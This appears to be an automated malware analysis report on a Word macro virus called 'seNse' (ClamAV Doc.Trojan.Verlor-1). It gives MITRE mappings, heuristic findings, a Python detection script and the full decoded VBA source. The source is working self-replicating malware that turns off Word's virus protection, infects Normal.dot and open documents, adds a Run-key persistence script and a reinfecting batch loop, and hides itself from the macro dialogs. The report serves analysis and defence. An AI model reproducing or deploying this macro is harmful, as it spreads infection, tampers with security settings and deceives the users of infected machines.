Verdict: MALICIOUS
Risk Score: 396
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1059 Command and Scripting Interpreter
T1140 Deobfuscate/Decode Files or Information
T1027 Obfuscated Files or Information
The sample carries a VBA macro (module name "seNse") that turns off Word's macro-virus protection (Options.VirusProtection = False) and copies itself between the active document and the global template Normal.dot through the VBE object model: it exports the module with VBComponents.Export to a file named with a .dll extension (the file is VBA source text, not a Windows DLL) and re-imports it on the other side. For persistence it writes HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run, value "seNse", pointing at a dropped %windir%\seNse.vbs; that script creates a Word.Application COM object at each logon, removes any existing seNse module from Normal.dot and imports a fresh copy from %windir%\seNse.dll. A Stealth routine, run from AutoExec, saves the infected Normal template to %windir%\System\id.sys, copies it to c:\windll.dat and launches a hidden batch file that loops until it can move that copy over Normal.dot (which Word keeps locked while running), so a cleaned template is reinfected as soon as Word exits. Overridden ToolsMacro and ViewVBCode subs hide the infection: ToolsMacro strips the module's code before the Tools > Macro dialog is shown and restores it afterwards, and ViewVBCode deletes the module outright before opening the VBA editor. Nothing in the script downloads additional content; it is a self-replicating W97M-style macro virus whose payload is its own propagation and concealment, with AV tampering and Run-key persistence as the two detection-relevant behaviours.
Heuristics (9)

- [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Verlor-1
- [medium] OLE_VBA_MACROS: Document contains VBA macro code (6 related findings)
- [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: NTReturn = Shell(windir & "\System\seNse.bat", 0)
- [critical] OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro-virus self-replication / AV tampering. The macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behaviour of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
- [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- [low] OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script: Sub AutoClose()
- [low] OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script: windir = Environ("windir")
- [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS: Legacy WordBasic macro-virus markers. The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
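The heuristics above are signature-independent: they fire on behaviours (VBE object-model rewriting, VirusProtection tampering, Run-key writes, Shell calls, auto-exec entry points, Tools > Macro hooks) rather than on the Verlor hash. The following is an added example, not the analyzer's own code, of how such a behavioural triage can be approximated in pure Python over decoded VBA source. The rule ids, severities and weights are this example's own choices (the report's scoring is not public on this page), and SAMPLE is an excerpt of the decoded macro shown further down, trimmed to the lines the rules hit; the IOC extractor simply collects string literals that look like paths or registry keys, which on this sample yields the dropped files and the Run key.

```python
"""Heuristic triage of a decoded VBA macro for W97M-style macro-virus behaviour.

Added example for this report, not part of the analyzer's own code. Rule ids,
severities and weights are this example's own choices, not the report's.
SAMPLE is an excerpt of the decoded macro shown on this page.
"""
import re
from dataclasses import dataclass

SAMPLE = r'''Sub AutoExec()
Call Stealth
End Sub
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
windir = Environ("windir")
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
Open windir & "\seNse.vbs" For Append As #1
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Close #1
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ToolsMacro()
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, 10
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeNT
End Sub
'''

# (rule id, severity, regex, description). VBA is case-insensitive, so every
# pattern is compiled with re.IGNORECASE (note "import"/"deletelines" above).
RULES = [
    ("VBA_AUTOEXEC", "low", r"^\s*Sub\s+Auto(Exec|Open|Close|New|Exit)\s*\(",
     "auto-execution entry point"),
    ("VBA_AV_TAMPER", "critical", r"\bOptions\.VirusProtection\s*=\s*False\b",
     "disables Word macro-virus protection"),
    ("VBA_VBE_REPLICATION", "critical",
     r"\bVBComponents\b.*\.(Export|Import)\b|\bCodeModule\.(InsertLines|DeleteLines|AddFromString)\b",
     "rewrites VBA projects through the VBE object model"),
    ("VBA_RUNKEY", "critical", r"CurrentVersion\\Run\b", "writes a Run key (persistence)"),
    ("VBA_SHELL", "critical", r"\bShell\s*\(", "Shell call"),
    ("VBA_CREATEOBJ", "high", r"\bCreateObject\s*\(", "CreateObject call"),
    ("VBA_MENU_HOOK", "high", r"^\s*Sub\s+(ToolsMacro|ViewVBCode)\s*\(",
     "overrides a built-in Word command to hide the macro"),
    ("VBA_DROPPER", "medium", r"\bOpen\s+.*\bFor\s+(Append|Output)\s+As\s+#\d",
     "writes a file to disk"),
]
SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 6, "critical": 10}

# String literals that look like paths or registry keys: drive-rooted,
# backslash-rooted or an HKEY_ hive. The macro prefixes the relative "\x"
# fragments with %windir%, so they are reported as written.
IOC_RE = re.compile(r'"((?:HKEY_[A-Z_]+|[A-Za-z]:)?\\[^"]+)"')


@dataclass
class Finding:
    rule: str
    severity: str
    description: str
    line_no: int
    line: str


def scan(source: str) -> list[Finding]:
    """Return the first matching line for every rule that fires, in RULES order."""
    findings = []
    lines = source.splitlines()
    for rule, severity, pattern, description in RULES:
        rx = re.compile(pattern, re.IGNORECASE)
        for no, line in enumerate(lines, 1):
            if rx.search(line):
                findings.append(Finding(rule, severity, description, no, line.strip()))
                break
    return findings


def verdict(findings: list[Finding]) -> tuple[int, bool]:
    """Additive score plus an explicit flag for self-replication combined with
    AV tampering, the defining W97M pair, so it never hinges on the score alone."""
    score = sum(SEVERITY_WEIGHT[f.severity] for f in findings)
    fired = {f.rule for f in findings}
    return score, {"VBA_VBE_REPLICATION", "VBA_AV_TAMPER"} <= fired


def iocs(source: str) -> list[str]:
    """Deduplicated path/registry literals found in the source."""
    return sorted(set(IOC_RE.findall(source)))


if __name__ == "__main__":
    found = scan(SAMPLE)
    for f in found:
        print(f"[{f.severity:<8}] {f.rule:<22} line {f.line_no}: {f.line}")
    score, macro_virus = verdict(found)
    print(f"score={score} macro_virus={macro_virus}")
    print("IOCs:", *iocs(SAMPLE), sep="\n  ")
```

Run on the excerpt, all eight rules fire and the replication-plus-AV-tampering flag is set; the IOC list gives the Run key and the three dropped paths, which is what an IR analyst would hunt for on other hosts. The rules deliberately key on the VBE object model (VBComponents Export/Import, CodeModule InsertLines/DeleteLines) rather than on the "seNse" string, so they also catch re-named variants of the same family.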
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5477 bytes | ee74fcaf531b493446464f90ba3f42b3a96e196ce949e2422190e94764fef076 | ClamAV: Doc.Trojan.Verlor-1; obfuscation or payload: unlikely |
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "seNse"
Sub AutoExec()
Call Stealth
End Sub
Sub AutoClose()
On Error Resume Next
'MyName = seNse
'WrittenBy = f0re [UC/Skamerwerks/DVC]
'SpecialTanksTo = Flitnic
'Version = .C (1.1)
Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
windir = Environ("windir")
If Dir(NormalTemplate.FullName) = "" Then GoTo EndSub
SetAttr NormalTemplate.FullName, vbNormal
If NormalTemplate.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Dir(windir & "\seNse.vbs") <> "" Then Kill (windir & "\seNse.vbs")
If Dir(windir & "\seNse.dll") <> "" Then Kill (windir & "\seNse.dll")
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\seNse.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
Open windir & "\seNse.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "seNse" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
EndSub:
End Sub
Sub Stealth()
windir = Environ("windir")
If Dir(windir & "\System\id.sys") <> "" Then Kill windir & "\System\id.sys"
If Dir(windir & "\System\seNse.bat") <> "" Then Kill windir & "\System\seNse.bat"
NormalTemplate.OpenAsDocument
NTAtt = ActiveDocument.ReadOnly
ActiveDocument.SaveAs FileName:=windir & "\System\id.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
NormalTemplate.Saved = True
ActiveDocument.Saved = True
ActiveDocument.Close
Close #1
Open windir & "\System\seNse.bat" For Append As #1
Print #1, ":Begin"
For i = 1 To 500
Print #1, "rem seNse was coded by f0re [UC/Skamwerks/DVC]"
Next i
Print #1, ":Begin"
Print #1, "Move /y " & Chr(34) & "c:\windll.dat" & Chr(34) & " " & Chr(34) & NormalTemplate.FullName & Chr(34)
Print #1, "If exist c:\windll.dat goto Begin"
Close #1
FileCopy windir & "\System\id.sys", "c:\windll.dat"
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ViewVBCode()
On Error Resume Next
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("seNse")
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
Documents(X).Saved = True
Documents(X).VBProject.VBComponents.Remove Documents(X).VBProject.VBComponents("seNse")
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For X = 1 To ActiveDocument.VBProject.VBComponents("seNse").CodeModule.CountOfLines
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeNT
NormalTemplate.Save
If docnumber >= 1 Then
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a module called "seNse". Experience stealth :) (but again not perfect stealth).